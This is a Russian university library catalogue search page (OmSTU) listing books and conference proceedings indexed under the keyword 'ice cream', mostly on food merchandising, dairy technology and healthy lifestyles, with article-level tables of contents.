Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

91 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=МОРОЖЕНОЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 38
1. 
Товароведение и организация торговли продовольственными товарами [Текст] : учеб. для учреждений нач. проф. образования / А. М. Новикова, Т. С. Голубкина, Н. С. Никифорова, С. А. Прокофьева, 2000. - 472 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ зерномучных ТОВАРОВ -- ТОВАРОВЕДЕНИЕ плодоовощных ТОВАРОВ -- ТОВАРОВЕДЕНИЕ вкусовых товаров -- ТОВАРОВЕДЕНИЕ кондитерских товаров -- ТОВАРОВЕДЕНИЕ молочных товаров -- ЯЙЦЕПРОДУКТЫ -- ЖИР ПИЩЕВОЙ -- ТОВАРОВЕДЕНИЕ мясных продуктов -- ТОВАРОВЕДЕНИЕ рыбных продуктов -- ТОРГОВЛЯ РОЗНИЧНАЯ -- СПРОС ПОКУПАТЕЛЬСКИЙ -- ТАРА -- МАГАЗИН -- ПРИЕМКА ТОВАРОВ -- ХРАНЕНИЕ ТОВАРА -- Выкладка товара -- ПРОДАЖА ТОВАРА -- УПАКОВКА товара -- ШТРИХОВОЕ КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА -- КРУПА -- МУКА -- ХЛЕБ -- ДРОЖЖИ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ОВОЩИ -- Плоды -- Грибы -- ЧАЙ -- КОФЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- Напиток слабоалкогольный -- КРАХМАЛ -- Сахар -- Мед -- Молоко -- Мороженое -- Сыр -- МЯСО -- Рыба
Держатели документа (Информация об экземплярах) 
2. 
Коник Н. В. Товароведение, экспертиза и сертификация молока и молочных продуктов [Текст] : учеб. пособие / Н. В. Коник, Е. А. Павлова, И. С. Киселева, 2009. - 2345 с.
Держатели документа (Информация об экземплярах) 
3. 
Здоровый образ жизни человека - национальная проблема современного общества. Т. 1 [Текст] : сб. материалов межрегион. науч.-практ. конф. студентов, аспирантов и молодых ученых, 17 марта 2009 г. / Омский экономический ин-т, 2009. - 237 с.
Оглавление 
  • Авдеев, Ю. А. Формирование здоровьесберегающей среды в летнем оздоровительном лагере / Ю. А. Авдеев. - с.9-12
  • Алшынбаев, К. И. Содержание и методы физического воспитания старшеклассников, ориентированного на приоритет здоровья / К. И. Алшынбаев. - с.13-15
  • Астанкова, Т. В. Роль двигательной активности в жизнедеятельности человека / Т. В. Астанкова. - с.16-17
  • Бакин, А. В. Особенности организации профессионально-прикладной физической подготовки / А. В. Бакин. - с.18-22
  • Белова, Т. Ю. Спортивно-ориентированный подход в учебно-тренировочном процессе по легкой атлетике в вузе / Т. Ю. Белова, И. В. Полозкова, Ю. В. Семенова. - с.22-28
  • Беспалова, Т. А. Организационно-экономические механизмы функционирования системы институтов, обеспечивающих защиту земель сельхозназначения от деградации / Т. А. Беспалова, О. А. Приступа. - с.28-32
  • Бирич, Т. Н. Профилактика наркомании средствами физической культуры / Т. Н. Бирич. - с.32-35
    Кл. слова: НАРКОМАНИЯ - ПРОФИЛАКТИКА
  • Бобырева, М. М. Физическая культура и спорт в потребностях студенческой молодежи / М. М. Бобырева, Е. В. Дема, К. Н. Шайхисламов. - с.35-38
    Кл. слова: КУЛЬТУРА ФИЗИЧЕСКАЯ
  • Боровлева, М. М. Физическая культура и спорт как часть корпоративной культуры / М. М. Боровлева. - с.38-42
  • Быстрова, А. А. Методические подходы к формированию здорового образа жизни у молодежи / А. А. Быстрова. - с.43-48
    Кл. слова: ЗДОРОВЫЙ ОБРАЗ ЖИЗНИ
  • Вакуленко, А. Н. Оценка качества жизни студентов технического университета / А. Н. Вакуленко, В. П. Гладенкова, А. Ю. Жмыхова. - с.48-55
  • Варзиев, С. Х. "Стиль новых движений" как один из базовых элементов современных здоровьесберегающих технологий / С. Х. Варзиев. - с.55-57
  • Маркетинговые исследования мороженного на омской рынке. - с.58-64
    Кл. слова: МОРОЖЕНОЕ, ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ
  • Воинова, П. А. Эпидемия XXI века / П. А. Воинова, В. А. Егоров. - с.65-68
    Кл. слова: ОЖИРЕНИЕ
  • Волчек, А. С. Характеристика содержания военно-патриотического воспитания в образовательных учреждениях / А. С. Волчек. - с.69-71
    Кл. слова: ВОСПИТАНИЕ военно-патриотическое
  • Воронин, Р. М. Влияние дозированной физической нагрузки на курсантов с различным психологическим профилем личности / Р. М. Воронин. - с.72-74
  • Внедрение элементов дистанционного обучения в учебный процесс. - с.75-78
    Кл. слова: ОБУЧЕНИЕ ДИСТАНЦИОННОЕ
  • Гуляева, О. А. Психолого-педагогическое сопровождение женщин в период вынашивания и рождения ребенка / О. А. Гуляева. - с.79-83
    Кл. слова: ПСИХОЛОГИЯ БЕРЕМЕННОЙ
  • Дамер, Н. А. Физическая культура - ведущий фактор укрепления здоровья молодежи / Н. А. Дамер. - с.83-86
  • Даровских, В. Д. Рациональные взаимоотношения партнеров в бизнесе / В. Д. Даровских. - с.87-98
  • Дергунова, Н. В. Культура питания и бизнес ресторанных услуг / Н. В. Дергунова. - с.98-102
    Кл. слова: КУЛЬТУРА ПИТАНИЯ, БИЗНЕС РЕСТОРАННЫЙ
  • Домиева, Н. Ф. Формирование здорового образа жизни на основе двигательной активности / Н. Ф. Домиева, Б. Н. Домиев. - с.103-105
  • Доржиева, Д. Э. Применение здровьесберегающих технологий в школьном образовательном пространстве (на примере I ступени) / Д. Э. Доржиева. - с.106-109
  • Емелина, А. С. Здоровая пища - здоровая нация / А. С. Емелина. - с.109-112
  • Жаровский, А. В. Организация спортивно-оздоровительного досуга молодежи как средство профилактики асоциальных явлений / А. В. Жаровский. - с.113-115
  • Жданеев, В. В. Обеспечение личной безопасности при угрозе террористических актов / В. В. Жданеев. - с.116-119
    Кл. слова: БЕЗОПАСНОСТЬ ЛИЧНАЯ
  • Завьялов, К. В. Организация учебно-тренировочного процесса студентов ОмГУ, специализирующихся в горном беге / К. В. Завьялов. - с.119-122
  • Затолокина, А. Д. Основы состояния здоровья детей с учетом эколого-гигиенических проблем / А. Д. Затолокина, С. М. Яцун. - с.123-125
    Кл. слова: ЗДОРОВЬЕ - ЭКОЛОГИЯ
  • Изосимова, И. В. Использование вторичного растительного сырья в производстве экологически безопасных продуктов питания / И. В. Изосимова, О. М. Сергачева, А. М. Тимофеева. - с.126-128
    Кл. слова: СЫРЬЕ ВТОРИЧНОЕ
  • Кальсина, В. В. Значение гендерных особенностей восприятия времени в профилактике развития девиантного поведения / В. В. Кальсина. - с.129-131
    Кл. слова: ВОСПРИЯТИЕ ВРЕМЕНИ
  • Каня, И. П. Некоторые составляющие здоровья организма человека / И. П. Каня, О. Ю. Мельникова. - с.132-134
  • Карначев, И. П. Роль совместимости системы "человек - среда обитания" в условиях Кольского Заполярья с позицией обеспечения безопасности жизнедеятельности человека / И. П. Карначев. - с.134-140
  • Кирюшкина, А. Г. Влияние рекреационных ресурсов на здоровье школьников / А. Г. Кирюшкина. - с.141-145
  • Китаева, А. В. Особенности специальной физической и технической подготовки девушек в мини-лапте / А. В. Китаева. - с.145-148
  • Клименко, А. А. Фитбол-аэробика в физическом воспитании студентов / А. А. Клименко. - с.148-150
    Кл. слова: Фитбол - аэробика
  • Ковальчук, О. Г. Физические упражнения, как способ гармоничного развития молодежи / О. Г. Ковальчук, И. В. Полозкова, Т. А. Седельникова. - с.151-154
    Кл. слова: УПРАЖНЕНИЕ ФИЗИЧЕСКОЕ
  • Ковшов, С. В. К вопрсу о влиянии промышленной пыли на здоровье горнорабочих / С. В. Ковшов. - с.155-159
  • Коннова, С. С. Оптимизация расписания занятий в соответствии с хронотипами учащихся как фактор адаптации первокурсников вузов к процессу обучения / С. С. Коннова. - с.160-164
  • Корнева, И. Н. Совершенствование системы здоровьесбережения дошкольников / И. Н. Корнева. - с.164-167
    Кл. слова: ЗДОРОВЬЕ ДЕТЕЙ
  • Коробков, С. В. Особенности питания студенческой молодежи / С. В. Коробков, Е. Н. Коробкова, А. А. Шаров. - с.167-169
    Кл. слова: ПИТАНИЕ СТУДЕНТОВ
  • Короткова, О. Г. Хлебобулочные изделия из многокомпонентных смесей, как компонент здорового питания населения / О. Г. Короткова, О. И. Стабровская. - с.170-172
  • Криживецкая, О. В. Организационно-методические особенности использования фитнеса в физическом воспитании студенток / О. В. Криживецкая, А. В. Кокшаров. - с.173-175
    Кл. слова: ФИТНЕС
  • Кузнецов, А. Ф. Представление о системе жизненных ценностей студентов как основной педагогический ориентир воспитательной работы вуза / А. Ф. Кузнецов. - с.176-181
  • Купавцев, Т. С. Современные подходы к организации физической подготовки в вузе МВД России / Т. С. Купавцев. - с.181-186
  • Лавренков, В. В. Проблемы питания юных пловцов в современных условиях / В. В. Лавренков. - с.186-189
  • Лебедева, В. И. Влияние занятий физической культурой на физическое развитие и функциональное состояние школьников / В. И. Лебедева, Л. Е. Голубева. - с.189-193
  • Ли, Л. А. Экспоненциальный характер влияния ядерных испытаний на здоровье населения / Л. А. Ли, И. Е. Колесникова. - с.193-198
    Кл. слова: ИСПЫТАНИЕ ядерное
  • Лисаченко, О. В. Проблема здоровья молодежи - стратегическое направление в государственной политике современной России / О. В. Лисаченко. - с.198-201
  • Литвиненко, Ю. А. Гладиатура и феномен Колизея в контексте ценностей олимпизма / Ю. А. Литвиненко. - с.201-205
  • Лобанов, А. Н. Психологическое здоровье населения в условиях чрезвычайных ситуаций / А. Н. Лобанов. - с.206-215
    Кл. слова: ЗДОРОВЬЕ ПСИХИЧЕСКОЕ
  • Лобанов, А. Н. Защита от терроризма / А. Н. Лобанов. - с.216-222
    Кл. слова: ТЕРРОРИЗМ
  • Ляликов, И. В. Избранный вид спорта как средство воспитания конкурентоспособной личности / И. В. Ляликов. - с.223-225
  • Ляликов, И. В. Повышение двигательной активности и преобщение к здоровому образу жизни средствами игр с мячом / И. В. Ляликов, Н. Н. Ляликова. - с.226-228
  • Мазанько, Е. И. Разработка государствненной системы контроля качества алкогольной продукции для обеспечения безопасности жизнедеятельности человека / Е. И. Мазанько. - с.229-231
  • Малаховская, Н. И. Факторы, определяющие интерес студентов к физической культуре (на примере плавания) / Н. И. Малаховская. - с.233-234
Держатели документа (Информация об экземплярах) 
4. 
Дмитриченко М. И. Товароведение и экспертиза пищевых жиров, молока и молочных продуктов [Текст] : учеб. пособие для студентов высш. учеб. заведений / М. И. Дмитриченко, Т. В. Пилипенко, 2004. - 352 с.
Держатели документа (Информация об экземплярах) 
5. 
Машины и аппараты пищевых производств [Текст] : учеб. для вузов по направлению подгот. дипломир. специалистов "Пищевая инженерия": в 3 кн. / под ред. В. А. Панфилова. Кн. 1 / С. Т. Антипов [и др.], 2009. - 607, [1] с.
Держатели документа (Информация об экземплярах) 

В учебнике обобщены сведения о состоянии и перспективе технического обеспечения пищевых и перерабатывающих производств. Особое внимание уделено проблемам, стоящим перед специалистами в деле повышения эффективности машинных технологий продуктов питания. Представлены современные формы организации технологических комплексов, а также машинно-аппаратурные схемы линий для переработки сельхозсырья растительного и животного происхождения, а также морепродуктов в продукты питания. Изложены научные основы реализуемых процессов и инженерные расчеты важнейших характеристик машин и аппаратов. Описано оборудование для ведения механических, гидромеханических, тепломассообменных и биотехнологических процессов, а также для дозирования и упаковывания пищевых продуктов. Рассмотрены методы организации технического обслуживания и ремонта оборудования, приоритетные научные проблемы и инженерные задачи развития пищевых производств, вопросы организации создания новой техники.

6. 
Гаврилова Н. Б. Технология молока и молочных продуктов: традиции и инновации [Текст] : учеб. для студентов высш. учеб. заведений / Н. Б. Гаврилова, М. П. Щетинин, 2012. - 540 с.
Держатели документа (Информация об экземплярах) 
7. 
Философия современности [Текст] / ред. О. П. Фесенко, 2013. - 115 с.
Ключевые слова 
Оглавление 
  • Анохина, О. А. Гуманитарное образование современной молодежи - основа ее познавательной и социальной активности / О. А. Анохина. - с.4-7
    Кл. слова: НАУКА ГУМАНИТАРНАЯ, ОБРАЗОВАНИЕ ГУМАНИТАРНОЕ, КУЛЬТУРОЛОГИЯ
  • Борисов, С. В. Современность как экзистенциал / С. В. Борисов. - с.8-10
    Кл. слова: БЫТИЕ, ВРЕМЯ, ЭКЗИСТЕЦИЯ
  • Воробьева, Е. С. Индивидуализм как образ жизни, внутреннее "я" как единственное мерило нравственности / Е. С. Воробьева. - с.11-16
    Кл. слова: НРАВСТВЕННОСТЬ, СВОБОДА, ПОСТУПОК
  • Довгань, А. В. Грани индивидуализма: прокрастинация и философский зомби / А. В. Довгань. - с.16-26
    Кл. слова: ИНДИВИДУАЛИЗАЦИЯ, СОЗНАНИЕ - ФИЛОСОФИЯ, ЗОМБИ ФИЛОСОФСКИЙ
  • Жапарова, А. К. Потребительство как социокультурный феномен / А. К. Жапарова. - с.27-32
    Кл. слова: ОБЩЕСТВО ПОСТИНДУСТРИАЛЬНОЕ, ФИЛОСОФИЯ ПОТРЕБИТЕЛЬСТВА
  • Зимонин, И. Н. Роль информации в развитии мотивации образовательной деятельности: социально-философский анализ / И. Н. Зимонин. - с.33-35
    Кл. слова: ИНФОРМАЦИЯ, ДЕЯТЕЛЬНОСТЬ ОБРАЗОВАТЕЛЬНАЯ
  • Караваев, Н. Л. О философии информации / Н. Л. Караваев. - с.36-38
    Кл. слова: ИНФОРМАЦИЯ, ФИЛОСОФИЯ ИНФОРМАЦИИ
  • Киндеркнехт, А. С. К вопросу о теории в гуманитарных исследованиях начала XXI века / А. С. Киндеркнехт. - с.39-43
    Кл. слова: ЗНАНИЕ НАУЧНОЕ, МЕЖДИСЦИПЛИНАРНОСТЬ, ИССЛЕДОВАНИЕ ГУМАНИТАРНОЕ
  • Киселева, Е. О. Маркетинговый подход к классификации основных потребителей отдаленных территорий для создания эффективного рыночного предложения / Е. О. Киселева. - с.43-49
    Кл. слова: МАРКЕТИНГ ТЕРРИТОРИЙ
  • Колесник, М. В. Монетизация сознания / М. В. Колесник. - с.49-53
    Кл. слова: МОНЕТИЗАЦИЯ СОЗНАНИЯ
  • Колесникова, С. В. Современные технологии обучения: теоретический аспект / С. В. Колесникова. - с.53-57
    Кл. слова: ТЕХНОЛОГИИ ОБРАЗОВАТЕЛЬНЫЕ, ТЕХНОЛОГИИ - ОБУЧЕНИЕ
  • Конышев, А. Н. Синхромаркетинг как метод преодоления сезонности спроса на рынке мороженного / А. Н. Конышев, А. А. Кайгородцева. - с.57-62
    Кл. слова: СПРОС - МАРКЕТИНГ, СЕЗОННОСТЬ СПРОСА, МОРОЖЕНОЕ - ТОРГОВЛЯ
  • Николаева, Е. В. Множество Мандельброта как фрактальная метафора культуры / Е. В. Николаева. - с.62-66
    Кл. слова: МНОЖЕСТВО МАНДЕЛЬБРОТА, ФРАКТАЛ КОНЦЕПТУАЛЬНЫЙ
  • Пащенко, О. В. Гедонистические установки сознания современного человека / О. В. Пащенко. - с.67-71
    Кл. слова: ГЕДОНИЗМ, КУЛЬТ ТЕЛА, СЕКСУАЛЬНОСТЬ
  • Рожина, Е. Ю. Стоимость жизни и цена труда современного человека / Е. Ю. Рожина. - с.71-76
    Кл. слова: СТОИМОСТЬ ЖИЗНИ ЧЕЛОВЕКА, ЦЕНА ТРУДА
  • Сенин, И. Н. О современной русской национальной идее / И. Н. Сенин. - с.77-89
    Кл. слова: ИДЕЯ НАЦИОНАЛЬНАЯ
  • Фесенко, О. П. Заимствованная лексика и речь современного студента: к вопросу об освоении лексического фонда / О. П. Фесенко. - с.89-97
    Кл. слова: ЛЕКСИКА ЗАИМСТВОВАННАЯ, РЕЧЬ СТУДЕНТА
  • Шакирова, Е. Б. Ризома: матафора постсовременности / Е. Б. Шакирова. - с.97-102
  • Шулдяков, В. А. "Воспитывать не в страхе наказания, а в стыде наказания". Философия воспитания в кадетских корпусах императорской России (конец XIX - начало XX вв.) / В. А. Шулдяков. - с.102-110
    Кл. слова: ВОСПИТАНИЕ НРАВСТВЕННОЕ, КОРПУС КАДЕТСКИЙ, КАДЕТ
  • Щелканова, Н. Ю. Omnia mea mecum porto: о вариациях "своего" / Н. Ю. Щелканова. - с.110-113
    Кл. слова: СВОЁ, ВЕЩЬ, СИМВОЛ
Держатели документа (Информация об экземплярах) 
8. 
Востроилов А. В. Основы переработки молока и экспертиза качества молочных продуктов [Текст] / А. В. Востроилов, И. Н. Семенова, К. К. Полянский, 2010. - 505 с.
Держатели документа (Информация об экземплярах) 
9. 
Современное состояние и перспективы развития индустрии питания и гостеприимства. В 2 т. Т. 1 [Текст] / ред. А. И. Барановский, 2012. - 174 с.
Ключевые слова 
Оглавление 
  • Авраменко, К. О. Формат «Free Flow» как инновационное направление в предприятиях индустрии питания / К. О. Авраменко, Н. В. Бураковская. - с.6-7
    Кл. слова: FREE FLOW
  • Агеева, Е. А. Современное состояние и направления развития общественного питания в г. Магнитогорске / Е. А. Агеева, И. А. Долматова. - с.7-12
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ
  • Деменконя, Е. М. Школьное питание как фактор развития здорового поколения / Е. М. Деменконя, М.А. Гриценко. - с.13-16
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Дризнер, Р. А. Современное состояние отрасли общественною питания в г. Екатеринбурге, проблемы кадров, трудоустройства и пути решения / Р. А. Дризнер. - с.16-21
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ - КАДРЫ
  • Есина, А. Н. Соответствие испытательной лаборатории "Сертификат" критериям аккредитации / А. Н. Есина. - с.21-25
  • Каня, И. П. Бинарные занятия как средство формирования экспериментальных навыков (из опыта преподавания на технологическом факультете ОмЭИ) / И. П. Каня, О. Ю. Мельникова, А. Н. Королев. - с.25-28
    Кл. слова: ЗАНЯТИЕ БИНАРНОЕ
  • Ковальчук, А. В. Анализ рынка оборудования предприятий питания в России / А. В. Ковальчук, М. А. Шадрин. - с.28-34
    Кл. слова: ОБОРУДОВАНИЕ ПРЕДПРИЯТИЯ ОБЩЕСТВЕННОГО ПИТАНИЯ, РЫНОК ОБОРУДОВАНИЯ ПРЕДПРИЯТИЙ ПИТАНИЯ
  • Конищева, Е. А. Контроль качества меда / Е. А. Конищева, Е. П. Галкова. - с.31-34
    Кл. слова: КОНТРОЛЬ КАЧЕСТВА МЕДА, МЕД
  • Котова, Т. И. Современные тенденции развития рынка предприятии общественного питания г. Магнитогорска / Т. И. Котова, И. А. Долматова, В. Ф. Рябова. - с.34-41
    Кл. слова: ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ
  • Кузьменко, С. П. Реализация системы управления качеством продукции в Сибирском регионе / С. П. Кузьменко, М. А. Тарасова, М. А. Шадрин. - с.41-43
    Кл. слова: УПРАВЛЕНИЕ КАЧЕСТВОМ ПРОДУКЦИИ, СИБИРЬ
  • Кусаинова, Д. А. Гастрономические особенности китайской кухни / Д. А. Кусаинова. - с.44-45
    Кл. слова: КУХНЯ КИТАЙСКАЯ
  • Мустакова, М. М. О необходимости внедрения современных систем менеджмента на предприятия пищевой перерабатывающей промышленности стран таможенного союза / М. М. Мустакова. - с.46-49
    Кл. слова: ПРЕДПРИЯТИЕ ПИЩЕВОЙ ПРОМЫШЛЕННОСТИ, СОЮЗ ТАМОЖЕННЫЙ, МЕНЕДЖМЕНТ
  • Пестова, П. А. Личность в социальной системе управления сферы услуг / П. А. Пестова. - с.49-54
    Кл. слова: СФЕРА УСЛУГ
  • Плаксина, Н. Н. Изучение аминокислотного состава блюд студенческих столовых / Н. Н. Плаксина, Н. И. Барышникова. - с.54-57
    Кл. слова: АМИНОКИСЛОТА, СТОЛОВАЯ СТУДЕНЧЕСКАЯ
  • Платова, А. В. Применение кейтеринга в Омском регионе на примере банкетного зала "Анна" / А. В. Платова, М. С. Мальцева, М. А. Шадрин. - с.57-59
    Кл. слова: КЕЙТЕРИНГ
  • Репин, М. Н. Характеристика рынка торгового оборудования Омского региона / М. Н. Репин, М. А. Шадрин. - с.59-62
    Кл. слова: ОБОРУДОВАНИЕ ТОРГОВОЕ, ОМСКАЯ ОБЛАСТЬ
  • Рождественская, Л. Н. Целеполагание в системе управления качеством услуг социального питания / Л. Н. Рождественская. - с.62-71
    Кл. слова: ПИТАНИЕ СОЦИАЛЬНОЕ, УПРАВЛЕНИЕ КАЧЕСТВОМ ПИТАНИЯ, КАЧЕСТВО ПИТАНИЯ
  • Седельникова, Д. С. Организация и технология диетического питания в гостиничных комплексах / Д. С. Седельникова. - с.72-74
    Кл. слова: ПИТАНИЕ ДИЕТИЧЕСКОЕ, ГОСТИНИЦА - ПИТАНИЕ
  • Турлубаева, А. Н. Обеспечение качества и безопасности пищевых продуктов / А. Н. Турлубаева, С. В. Стадникова. - с.74-78
    Кл. слова: БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ
  • Хлононских, Н. А. Особенности обслуживания тематических мероприятий / Н. А. Хлононских. - с.78-81
    Кл. слова: ОБСЛУЖИВАНИЕ МЕРОПРИЯТИЙ
  • Янушкевич, К. А. Роль международных стандартов в обеспечении качества и безопасности пищевых продуктов / К. А. Янушкевич, Н. А. Смирнова. - с.81-84
    Кл. слова: БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ
  • Алексеева, Г. В. Способы повышения качества кондитерских изделий на жировой основе / Г. В. Алексеева, И. А. Ивкова. - с.86-90
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ, ВАФЛИ
  • Аникина, Е. Н. Актуальность разработки молочно-злаковых продуктов / Е. Н. Аникина. - с.91-94
    Кл. слова: ПРОДУКТЫ МОЛОЧНО-ЗЛАКОВЫЕ
  • Аникина, Е. Н. Перспективы использования пребиотиков в производстве ферментированных молочных продуктов / Е. Н. Аникина, О. В. Пасько. - с.94-98
    Кл. слова: ПРЕБИОТИКИ
  • Аралбаева, Г. Д. Индустриальные технологии в производстве молочных продуктов на примере ООО «Молочный завод "Лузинский" / Г. Д. Аралбаева, А. Б. Лобкова. - с.98-101
    Кл. слова: МОЛОКО, ЗАВОД МОЛОЧНЫЙ ЛУЗИНСКИЙ
  • Банадысева, И. Д. Особенности формирования потребительского восприятия инноваций в общественном питании / И. Д. Банадысева, Л. Н. Рождественская. - с.98-101
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ - ИННОВАЦИИ, ВОСПРИЯТИЕ ПОТРЕБИТЕЛЬСКОЕ
  • Беспалова, Т. А. Гармонизации стандартов продуктов питания / Т. А. Беспалова, О. А. Приступа. - с.107-113
    Кл. слова: СТАНДАРТЫ ПРОДУКТОВ ПИТАНИЯ
  • Васильева, В. Э. Функциональный наполнитель в хлебопечении / В. Э. Васильева. - с.113-116
    Кл. слова: ХЛЕБ, НАПОЛНИТЕЛИ ХЛЕБА
  • Вилемсон, Е. М. Разработка мороженого с пробиотическими свойствами / Е. М. Вилемсон, О. В. Пасько. - с.116-120
    Кл. слова: МОРОЖЕНОЕ
  • Воронкова, М. Н. Зависимость показателей качества хлеба пшеничного от показателей качества зерна пшеницы / М. Н. Воронкова. - с.120-125
    Кл. слова: КАЧЕСТВО ХЛЕБА, КАЧЕСТВО ЗЕРНА, ХЛЕБ
  • Воронова, Е. А. Производство функциональных продуктов на предприятии ООО "Сибирский молочный комбинат" / Е. А. Воронова, Н. И. Захарчснко, А. Г. Анацкая. - с.125-131
    Кл. слова: БИФИДИН
  • Вотинцев, Ю. П. Производство творожных продуктов методом ультрафильтрации / Ю. П. Вотинцев. - с.132-134
    Кл. слова: ПРОДУКТ ТВОРОЖНЫЙ, МЕТОД УЛЬТРАФИЛЬТРАЦИИ
  • Выставной, И. А. Изучение процесса ферментации сливочной основы ассоциациями микроорганизмов / И. А. Выставной. - с.134-140
    Кл. слова: ФЕРМЕНТАЦИЯ, МИКРООРГАНИЗМ
  • Гаврилова, Ю. А. Использование зимологических индикаторов при контроле качества пищевой продукции микробиологическими методами / Ю. А. Гаврилова. - с.141-144
    Кл. слова: ИНДИКАТОР ЗИМОЛОГИЧЕСКИЙ
  • Гатауллина, Ю. Р. Батончики мюсли повышенной биологической ценности на соево-злаковой основе / Ю. Р. Гатауллина. - с.144-147
    Кл. слова: МЮСЛИ, БАТОНЧИКИ МЮСЛИ
  • Герунов, Т. В. Пестициды - потенциальная угроза качеству продуктов питания / Т. В. Герунов, А. П. Козлов, А. В. Леушин. - с.147-150
    Кл. слова: ПРОДУКТЫ ПИТАНИЯ - ПЕСТИЦИДЫ
  • Гончарова, Т. С. Современные способы повышения качества пищевых продуктов / Т. С. Гончарова. - с.150-153
    Кл. слова: КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ
  • Дудко, В. В. Современные индустриальные технологии пищевых продуктов / В. В. Дудко, В. А. Кузнецова. - с.153-156
    Кл. слова: ТЕХНОЛОГИЯ ПИЩЕВЫХ ПРОИЗВОДСТВ, ПРОИЗВОДСТВО ПИЩЕВОЕ
  • К вопросу о создании обогащенных продуктов питания / ; Ю. В. Евпатченко, [и др.]. - с.156-160
    Кл. слова: ПРОДУКТЫ ПИТАНИЯ ОБОГАЩЕННЫЕ
  • Оценка безопасности продуктов питания посредством показателя активности воды / ; Ю. В. Евпатченко, [и др.]. - с.160-164
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДУКЦИИ ПИЩЕВОЙ
  • Есипова, М. С. Разработка новых рецептур пудинга творожного с плодово-ягодными наполнителями для питания школьников / М. С. Есипова. - с.164-168
    Кл. слова: ПУДИНГ ТВОРОЖНЫЙ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Ефремова, О. М. Отруби как функциональная добавка в хлебобулочных изделиях / О. М. Ефремова. - с.169-171
    Кл. слова: ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ
Держатели документа (Информация об экземплярах) 
10. 
Товароведение и организация торговли продовольственными товарами [Текст] : Учеб. для учреждений нач. проф. образования / А. М. Новикова, Т. С. Голубкина, Н. С. Никифорова, С. А. Прокофьева, 2001. - 472 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ зерномучных ТОВАРОВ -- ТОВАРОВЕДЕНИЕ плодоовощных ТОВАРОВ -- ТОВАРОВЕДЕНИЕ вкусовых товаров -- ТОВАРОВЕДЕНИЕ кондитерских товаров -- ТОВАРОВЕДЕНИЕ молочных товаров -- ЯЙЦЕПРОДУКТЫ -- ЖИР ПИЩЕВОЙ -- ТОВАРОВЕДЕНИЕ мясных продуктов -- ТОВАРОВЕДЕНИЕ рыбных продуктов -- ТОРГОВЛЯ РОЗНИЧНАЯ -- СПРОС ПОКУПАТЕЛЬСКИЙ -- ТАРА -- МАГАЗИН -- ПРИЕМКА ТОВАРОВ -- ХРАНЕНИЕ ТОВАРА -- Выкладка товара -- ПРОДАЖА ТОВАРА -- УПАКОВКА товара -- ШТРИХОВОЕ КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА -- КРУПА -- МУКА -- ХЛЕБ -- ДРОЖЖИ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ОВОЩИ -- Плоды -- Грибы -- ЧАЙ -- КОФЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- Напиток слабоалкогольный -- КРАХМАЛ -- Сахар -- Мед -- Молоко -- Мороженое -- Сыр -- МЯСО -- Рыба
Держатели документа (Информация об экземплярах) 
11. 
Экспресс-курс повара [Текст] : учебное пособие / Авт.-сост. В. Полякова, 2002. - 447 с.
Держатели документа (Информация об экземплярах) 
12. 
Территориальные единичные расценки на монтаж оборудования. Омская область [Текст]. Ч. 28 : Оборудование предприятий пищевой промышленности, 2010. - 56 с.
Ключевые слова 
ТЕРм 81-03-28-2001 -- СМЕТНЫЙ -- НОРМАТИВ -- ДОЗИРОВАНИЕ -- МУКА -- СМЕШИВАНИЕ -- ПРИГОТОВЛЕНИЕ -- ДРОЖЖИ -- ДЕЖИ -- ТЕСТО -- СУШИЛКА -- СУХАРЬ -- РАСФАСОВКА -- САХАР -- МОЙКА -- МЕШАЛКА -- ЛОВУШКА -- ФИЛЬТРАЦИОННОЕ -- ВОДООТДЕЛИТЕЛЬ -- ВОДООТВОДЧИК -- ПРЕСС -- ДИФФУЗИОННОЕ -- ПЕЧЬ -- РАЗДЕЛКА -- ТУША -- ЛЬДОГЕНЕРАТОР -- ПОСОЛЬНОЕ -- РЕЗЕРВУАР -- МОЛОКО -- ТЕРМООБРАБОТКА -- СЛИВКИ -- МАСЛО -- СЫР -- МОРОЖЕНОЕ -- КАЗЕИН -- ДРОБИЛКА -- УКУПОРКА -- МАКАРОНЫ -- КОНФЕТЫ -- ВИНОГРАД -- СПИРТ -- ПИВО -- ТАБАК -- ЧАЙ -- КАРТОНАЖНЫЕ -- ОБЩЕСТВЕННОЕ -- ПИТАНИЕ -- ЖЕСТЯНАЯ -- ТАРА -- СОЛОД -- СУСЛО
Держатели документа (Информация об экземплярах) 
13. 
Холодильная обработка молока и молочных продуктов [Текст] : сб. науч. тр. / ВНИКТИхолодпром, 1985. - 95, [1] с.
Держатели документа (Информация об экземплярах) 
14. 
Тимофеева, Валентина Афанасьевна. Товароведение продовольственных товаров [Текст] : Учеб. пособие для образоват. учреждений сред. и проф. образования по специальности 0612 "Товароведение" / В. А. Тимофеева, 2002. - 447 с.
Ключевые слова 
